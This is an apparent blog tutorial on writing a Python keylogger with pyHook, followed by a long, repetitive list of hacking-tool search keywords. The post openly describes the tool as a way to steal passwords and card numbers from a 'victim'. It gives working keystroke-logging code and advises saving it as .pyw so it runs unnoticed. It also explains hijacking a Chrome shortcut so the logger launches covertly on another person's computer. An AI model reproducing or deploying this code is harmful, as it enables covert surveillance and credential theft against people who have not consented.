2024年1月25日 星期四

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
More information

  1. Pentest Tools Apk
  2. Hacker Tools Hardware
  3. Hacker Tools For Windows
  4. What Are Hacking Tools
  5. Hacking App
  6. Pentest Tools Website
  7. Hack Tool Apk
  8. Top Pentest Tools
  9. Growth Hacker Tools
  10. Hack Tools Pc
  11. Hacker Tools Hardware
  12. Pentest Tools For Mac
  13. Hacker Techniques Tools And Incident Handling
  14. Pentest Tools Download
  15. Android Hack Tools Github
  16. Easy Hack Tools
  17. Hacking Tools Windows 10
  18. Hacker Search Tools
  19. Hacker Tools Linux
  20. Tools Used For Hacking
  21. Hacking Tools And Software
  22. Hack Tools Pc
  23. Hak5 Tools
  24. Pentest Tools For Ubuntu
  25. Hack And Tools
  26. Hack Tools
  27. Hack Tools For Mac
  28. Hacking Tools Mac
  29. Pentest Tools For Ubuntu
  30. Hacker Tools Software
  31. Hacking Tools Mac
  32. Ethical Hacker Tools
  33. Pentest Tools Find Subdomains
  34. Hackers Toolbox
  35. Nsa Hack Tools Download
  36. Hacker Tools For Pc
  37. Kik Hack Tools
  38. Hacking Tools Windows 10
  39. Hacking Tools For Beginners
  40. Physical Pentest Tools
  41. Nsa Hack Tools
  42. Underground Hacker Sites
  43. Hacking Tools And Software
  44. Pentest Tools Bluekeep
  45. Pentest Tools Open Source
  46. Hackers Toolbox
  47. Pentest Tools Tcp Port Scanner
  48. Pentest Tools Tcp Port Scanner
  49. Top Pentest Tools
  50. Hack Tools For Pc
  51. Install Pentest Tools Ubuntu
  52. Hacker Tools Windows
  53. Hacker Techniques Tools And Incident Handling
  54. Pentest Tools Find Subdomains
  55. Hacker Security Tools
  56. Usb Pentest Tools
  57. Pentest Automation Tools
  58. Hacker
  59. Hacking Tools For Pc
  60. Easy Hack Tools
  61. Pentest Tools Open Source
  62. Pentest Tools Port Scanner
  63. Hacker Tools For Windows
  64. Nsa Hacker Tools
  65. Hacking Tools Mac
  66. Pentest Tools Linux
  67. Hacking Tools For Windows
  68. Hacking Apps
  69. Pentest Tools Open Source
  70. Pentest Tools Open Source
  71. Hacking Tools Download
  72. Pentest Tools Alternative
  73. Kik Hack Tools
  74. Hack And Tools
  75. Hackrf Tools
  76. Pentest Tools Windows
  77. Hacker Techniques Tools And Incident Handling
  78. Hack Tools Online
  79. Hacker Security Tools
  80. Hack Tools Github
  81. Hacker Tools For Ios
  82. Github Hacking Tools
  83. Hacking App
  84. Pentest Tools Download
  85. Hacking Tools Kit
  86. Pentest Tools Tcp Port Scanner
  87. Hack Tools Online
  88. Hacker Tools Apk Download
  89. Pentest Tools Github
  90. Pentest Tools Online
  91. Pentest Tools Android
  92. Ethical Hacker Tools
  93. Hacker Tools Windows
  94. Hacker Tools Software
  95. Pentest Tools Apk
  96. Tools Used For Hacking
  97. Pentest Reporting Tools
  98. Easy Hack Tools
  99. Pentest Tools
  100. Hacker Tools Software
  101. Github Hacking Tools
  102. Beginner Hacker Tools
  103. Hacker Tools Apk
  104. Pentest Tools Download
  105. Hacking Tools Kit
  106. Pentest Tools For Mac
  107. Pentest Reporting Tools
  108. Hacking Tools Download
  109. Hack Tools
  110. Hacking Tools Software
  111. Hacker Tools For Pc
  112. Hack Tools
  113. Pentest Tools For Ubuntu
  114. Hack Apps
  115. Pentest Tools Windows
  116. Pentest Tools Nmap
  117. Hack Tools Download
  118. Hacker Techniques Tools And Incident Handling
  119. Hacker Tools Apk
  120. Hacker Tools For Windows
  121. Hacker Tools Online
  122. Bluetooth Hacking Tools Kali
  123. Hacker Techniques Tools And Incident Handling
  124. How To Make Hacking Tools
  125. Hacker Tools For Mac
  126. Pentest Tools Download
  127. Hack Tools Download
  128. Hacking Tools For Windows Free Download
  129. Hacker Tools Apk
  130. Hak5 Tools
  131. Hacking Tools For Windows
  132. Hacking Tools Free Download
  133. Hacker Tools Free
  134. Hacking Tools
  135. Hacking Tools Usb
  136. Pentest Box Tools Download
  137. Hacking Tools Windows 10
  138. Pentest Tools Url Fuzzer
  139. Hacking Tools Windows
  140. Pentest Tools Tcp Port Scanner
  141. Hack Tools For Games
  142. Hack Tools Online
  143. Hacking Tools For Windows
  144. Pentest Tools Windows
  145. Pentest Tools For Android
  146. Hacking Tools Github
  147. Hacker Tools 2020
  148. Pentest Tools Review
  149. New Hacker Tools
  150. Hacker Tools List
  151. Hack Website Online Tool
  152. Hacking Tools Windows
  153. Hacking Tools Online
  154. Hacker Tools For Pc
  155. Pentest Tools Free
  156. Hack Tools
  157. Termux Hacking Tools 2019
  158. Pentest Tools For Ubuntu
  159. Pentest Tools Download
  160. Hacker Tools Mac
  161. Install Pentest Tools Ubuntu
  162. Free Pentest Tools For Windows
  163. Hacking Tools Download

沒有留言: